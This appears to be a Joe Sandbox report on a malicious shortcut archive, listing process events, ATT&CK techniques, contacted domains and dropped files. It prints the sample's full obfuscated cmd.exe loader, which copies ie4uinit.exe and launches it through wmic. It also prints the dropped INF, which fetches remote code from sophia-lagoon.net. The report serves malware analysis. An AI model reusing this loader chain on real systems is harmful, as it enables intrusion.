Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" \| set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" \| set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Process Injection	LSASS Memory	1 Remote System Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	Logon Script (Windows)	1 Rundll32	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sophia-lagoon.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://sophia-lagoon.net/81754783lP	0%	Avira URL Cloud	safe
http://sophia-lagoon.net/81754783WWC:	0%	Avira URL Cloud	safe
http://sophia-lagoon.net/81754783	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sophia-lagoon.net	142.11.222.59	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sophia-lagoon.net/81754783	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high
http://sophia-lagoon.net/81754783WWC:	ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sophia-lagoon.net/81754783lP	ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.baidu.com/s?tn=80035161_2_dg&wd=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=	xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.11.222.59	sophia-lagoon.net	United States		54290	HOSTWINDSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	16737
Start date and time:	2023-02-15 23:30:11 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 48s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Education and Experience.lnk(1).zip
Detection:	MAL
Classification:	mal52.evad.winZIP@23/9@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .zip

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, usocoreworker.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fp.msedge.net, login.live.com, slscr.update.microsoft.com, r.bing.com, ctldl.windowsupdate.com, cdn.onenote.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:30:55	API Interceptor	1x Sleep call for process: WMIC.exe modified

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6574
Entropy (8bit):	4.837754607383038
Encrypted:	false
SSDEEP:	192:wnTkA+yk48l1fe0+xE3EjmEshEmCESnEAL6cET3KcoE0ESEMjE6oENtEFQxjSASD:wnTkA+yk44fe0+xE3EjmEshEmCESnE4I
MD5:	16783A1E3F36556A265FB98A68CFA261
SHA1:	218196E4BB48F554E5F2A8E85FECBD5ACC8122A9
SHA-256:	27DEE6684AA699F0789479FB7BF1391528E10A11F2882C0625A97B4D30A4BE79
SHA-512:	EAD374657EBF183BFEFFF68EDDEA9C1718E4E778A92717893F45C4130AAA139741D090F33D13719627742BEAE555D1598984451FD51EEDB9BA6AB3DCF517E08B
Malicious:	false
Preview:	06/08/2021 08:10:10 Checking for existence of Branding Active Setup stub.....06/08/2021 08:10:10 InternetExplorerBrandGUID didn't exist: Branding component not installed..06/08/2021 08:10:10 Inf Version is set to "11,00,18362,1"...06/08/2021 08:10:10 HKCU Active Setup Key not found.....06/08/2021 08:10:10 COM initialized with S_FALSE success code.....06/08/2021 08:10:10 Branding Internet Explorer.....06/08/2021 08:10:10 Command line is "/mode:isp /peruser".....06/08/2021 08:10:10 Global branding settings are:..06/08/2021 08:10:10 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..06/08/2021 08:10:10 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..06/08/2021 08:10:10 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...06/08/2021 08:10:10 Done.....06/08/2021 08:10:10 About to clear previous branding.....06/08/2021 08:10:10 Done.....06/08/2021 08:10:10 Processing mig

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4373
Entropy (8bit):	4.763910625087609
Encrypted:	false
SSDEEP:	48:Pi6MEGALVgHE7l1UbLNC2xiwq7bT3gvoUZTuQpwn77sl9h83E5lQWDBJqilEH0fT:JRhuElCHbATQp277wWETno0fAXzTB9k
MD5:	D03731C634445BDAC7B8F0509F3574CA
SHA1:	B78EC2B7F14D1A669B7BF06AEBA09A49C48DC673
SHA-256:	2207D9118753D81E22203A526E5D18CCA1E5598A1BF185CE6ED55224DC82BF40
SHA-512:	0A72369FD3769391350E2A4202D006014B7325D2855D4899017A9F022D479C2B2BC858E9FA2E9C9CA7D7A326009005A01F670D5DECC60B0CDA8F81480F5BFF5C
Malicious:	false
Preview:	02/15/2023 23:31:03 Checking for existence of Branding Active Setup stub.....02/15/2023 23:31:03 InternetExplorerBrandGUID didn't exist: Branding component not installed..02/15/2023 23:31:03 Inf Version is set to "11,00,18362,1"...02/15/2023 23:31:03 Branding conditions failed. Applying only default branding.....02/15/2023 23:31:03 COM initialized with S_FALSE success code.....02/15/2023 23:31:03 Branding Internet Explorer.....02/15/2023 23:31:03 Command line is "/mode:isp /peruser".....02/15/2023 23:31:03 Global branding settings are:..02/15/2023 23:31:03 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..02/15/2023 23:31:03 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..02/15/2023 23:31:03 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...02/15/2023 23:31:03 Done.....02/15/2023 23:31:03 About to clear previous branding.....02/15/2023 23:31:03 Done.....02/15/2023

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	998
Entropy (8bit):	3.1897095666620685
Encrypted:	false
SSDEEP:	12:QxEKkBrbtR4RYZMlWl5BQElFKkBrbzBQEl0WBQEl54RYZMlWlK:QxEl3tRMWkWSMFl36M0BM5MWkWc
MD5:	901B0CD404D2DC7404A22D5D937F90C8
SHA1:	F305E4859920252C78BE09641EFD021426BDC063
SHA-256:	22E002A51FFD67FC1413910971687FDD131C967CF93093E8A4CBEE59EE8DFE78
SHA-512:	1062A4AD5F1267CB57F361E6E7FCAC3F95699921451E9B16902851F94B32F1C20ECDC8468DDE4A5662C80A81D3A2F7A69221977CE8004438B3AE6C8787470BFF
Malicious:	false
Preview:	..0.6./.0.8./.2.0.2.1.:.0.8.:.1.0.:.1.0.:. .M.i.g.r.a.t.e.C.a.c.h.e.F.o.r.C.u.r.r.e.n.t.U.s.e.r.(.). .r.e.t.u.r.n.e.d.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.0.8./.2.0.2.1.:.0.8.:.1.0.:.1.5.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.0.8./.2.0.2.1.:.0.8.:.1.0.:.1.5.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.0.:.5.7.:. .M.i.g.r.a.t.e.C.a.c.h.e.F.o.r.C.u.r.r.e.n.t.U.s.e.r.(.). .r.e.t.u.r.n.e.d.:. .0.x.0.0.0.0.0.0.0.0.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.0.:.5.7.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.0.:.5.7.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	860
Entropy (8bit):	3.4395059622107897
Encrypted:	false
SSDEEP:	12:Q9KlBQEl5TdHeMXBQEll4ALBQEllknfA+sBQEllknfA+ZlYRYCDAyBQElJWBQEln:Q4GM5EMWMAMcA2McAYWOBVMJBMOMWkWc
MD5:	9F056460F96FCC2099C7536C5AB55F4C
SHA1:	FC1AA02C4C0E27283F6621BC317AD36D4BBE9931
SHA-256:	3184AB0AC7B6C6D20DFBF1F38D9A5C83EFCEB80A5741A75F988A7C6BEF51ECB8
SHA-512:	2091C348A0F470556F338FCEE8536ED9FE87D49F7601B270CB660E3E16A00A29D56E1242665D2D20B8F2C1705BCDC34353B03E557067E453EE7EAD0D08731493
Malicious:	false
Preview:	..0.2./.1.5./.2.0.2.3.:.2.3.:.3.0.:.5.6.:. .I.n. .C.m.d.C.l.e.a.r.I.c.o.n.C.a.c.h.e.O.n.S.t.a.r.t.u.p.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.1.:.0.3.:. .S.e.t.t.i.n.g. .H.o.m.e. .P.a.g.e.......0.2./.1.5./.2.0.2.3.:.2.3.:.3.1.:.0.3.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .R.e.s.u.l.t.:.0.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.1.:.0.3.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .T.e.x.t.:.[.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.p./.?.L.i.n.k.I.d.=.2.5.5.1.4.1.].......0.2./.1.5./.2.0.2.3.:.2.3.:.3.1.:.0.4.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.2./.1.5./.2.0.2.3.:.2.3.:.3.1.:.0.4.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Download File

Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	228352
Entropy (8bit):	6.135189401624645
Encrypted:	false
SSDEEP:	6144:jPuABc+M+8xSjntUCNSK0u3SaATnBWApQiY2ugns50/:rukF8xgtTSKSaATBTrL
MD5:	AD9AD3C852D59FBF125F02A09F1FF405
SHA1:	B9AFA6B8E91AA9936DDA909DBA18C34F64375282
SHA-256:	A97BE066A1D5A7188E853FFF3582CE9FD6C66ACE9517F921F9FA738C1BE2A4EB
SHA-512:	FA9BBC218068ED47E1B85D788295FE3714B0DCE5CBC55C9D55A44685F64EC799E5A18910F6C224368A149232C99040A54DF3574141FA3EC65B7CF1C2CBCFDEC8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x%..<D.<D.<D.g,.?D.g,.'D.g,.9D.g,..D.<D..F.g,.ID.g,9.=D.g,.=D.Rich<D.................PE..d....dg..........."......J...:.......L.........@....................................P.....`.......... .......................................%..........`....p..4...................0...T....................u..(....t..............0u.......$..@....................text....I.......J.................. ..`.rdata..j....`.......N..............@..@.data...p....P.......:..............@....pdata..4....p.......B..............@..@.didat..(............^..............@....rsrc...`............`..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	452
Entropy (8bit):	5.358976106673102
Encrypted:	false
SSDEEP:	12:WH+jXeJ8aM7hzQaN5TygUY2edCNjrQDlCNjYy:WH+XeKaM90a/yg0NjUsNJ
MD5:	3C112980D3CF3B8A8A5E5D78DCC0E432
SHA1:	8C1B1FA6A9299820887F71E77AB561EDBCA11D73
SHA-256:	36F0058CB1AEE4320F3F1A6C79B21A2918A5596C80F146FED0016E03C229E264
SHA-512:	832E6923C667B6E6EA7ED72D52DC44DE2C6616F6B789F7C4A31B01C566A48191BF88B088926711CB09CBBBD4E5A85948BCD5BE1FFBC1D9BC10D3AC6B3B13233B
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..E4139C=01..[defaultinstall.windows7]..UnRegisterOCXs=A687D4..delfiles=E4139C..[A687D4]..%11%\scro\..%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon.%Lucky56%/81754783..[E4139C]..ieu%Lucky69%.inf..[strings]..Lucky69=init..Lucky0=t;Lucky40..servicename=' '..Lucky21=h..Lucky1=:;Lucky35..Lucky9=/..shortsvcname=' '..Lucky56=net..Lucky51=b;Lucky67..Lucky25=23:30:54.12..

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Generic INItialization configuration [InternetShortcut]
Category:	dropped
Size (bytes):	208
Entropy (8bit):	5.212608038799256
Encrypted:	false
SSDEEP:	6:J254vVG/4xtOFJQgD8eDPOOKaihPlvsHX/qRyLb1CC:3VW4xtOFJ/DPOOKa403SyCC
MD5:	5D42DDDDA9951546C9D43F0062C94D39
SHA1:	4AF07C23EBB93BAD9B96A4279BEE29EBA46BE1EE
SHA-256:	E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E
SHA-512:	291298B4A42B79C4B7A5A80A1A98A39BE9530C17A83960C2CF591B86382448CD32B654A00FC28EAB4529DF333A634BCDC577AEF4A3A0A362E528B08F5221BEB1
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,2..[InternetShortcut]..IDList=..URL=http://go.microsoft.com/fwlink/p/?LinkId=255142..IconIndex=0..IconFile=%ProgramFiles%\Internet Explorer\Images\bing.ico..

C:\Windows\Temp\OLDF396.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	452
Entropy (8bit):	5.358976106673102
Encrypted:	false
SSDEEP:	12:WH+jXeJ8aM7hzQaN5TygUY2edCNjrQDlCNjYy:WH+XeKaM90a/yg0NjUsNJ
MD5:	3C112980D3CF3B8A8A5E5D78DCC0E432
SHA1:	8C1B1FA6A9299820887F71E77AB561EDBCA11D73
SHA-256:	36F0058CB1AEE4320F3F1A6C79B21A2918A5596C80F146FED0016E03C229E264
SHA-512:	832E6923C667B6E6EA7ED72D52DC44DE2C6616F6B789F7C4A31B01C566A48191BF88B088926711CB09CBBBD4E5A85948BCD5BE1FFBC1D9BC10D3AC6B3B13233B
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..E4139C=01..[defaultinstall.windows7]..UnRegisterOCXs=A687D4..delfiles=E4139C..[A687D4]..%11%\scro\..%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon.%Lucky56%/81754783..[E4139C]..ieu%Lucky69%.inf..[strings]..Lucky69=init..Lucky0=t;Lucky40..servicename=' '..Lucky21=h..Lucky1=:;Lucky35..Lucky9=/..shortsvcname=' '..Lucky56=net..Lucky51=b;Lucky67..Lucky25=23:30:54.12..

\Device\ConDrv

Download File

Process:	C:\Windows\System32\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.083203110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkRJHFJQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/egkrleAc
MD5:	538DB4F88C2B08B1F7A1082DA9699C29
SHA1:	FA2DF1429C6A8D30A0FE03A5B952DD08F5FA0038
SHA-256:	4BE6F5F1700C1FC8D4DB85808078B314E7B90D67FD3B78B62F7B0E7304EEFEF7
SHA-512:	B0E7C755D2063EF9065C91C0EFC408A38F8A473A6E1FF13663E2BE5E8AC2D0203C88950008A13E8CEE77D1027C899A31DBDB539A04F0845D45F029244BF36972
Malicious:	false
Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6680;...ReturnValue = 0;..};....

Static File Info

General

File type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Entropy (8bit):	7.873441821810936
TrID:	ZIP compressed archive (8000/1) 100.00%
File name:	Education and Experience.lnk(1).zip
File size:	2358
MD5:	254c94d8e782c1e10fd3021b56638bc7
SHA1:	cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:	af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
SHA512:	fc0b99d99c844c11a0eedca2e5b2be0d89cc4df7aefc6211c59528752ec05f6ac18dd73bbfdd64f524f33a6cc334e5c934e551579edcf4cf40c11e4e95fa6211
SSDEEP:	48:5vCU0UzLibPT0xV4OcoEhy8Gw/c9emEsLQPGn+8VT+hc2mZ:5vCU0mLa4QOkhy890UmdMPGPUBmZ
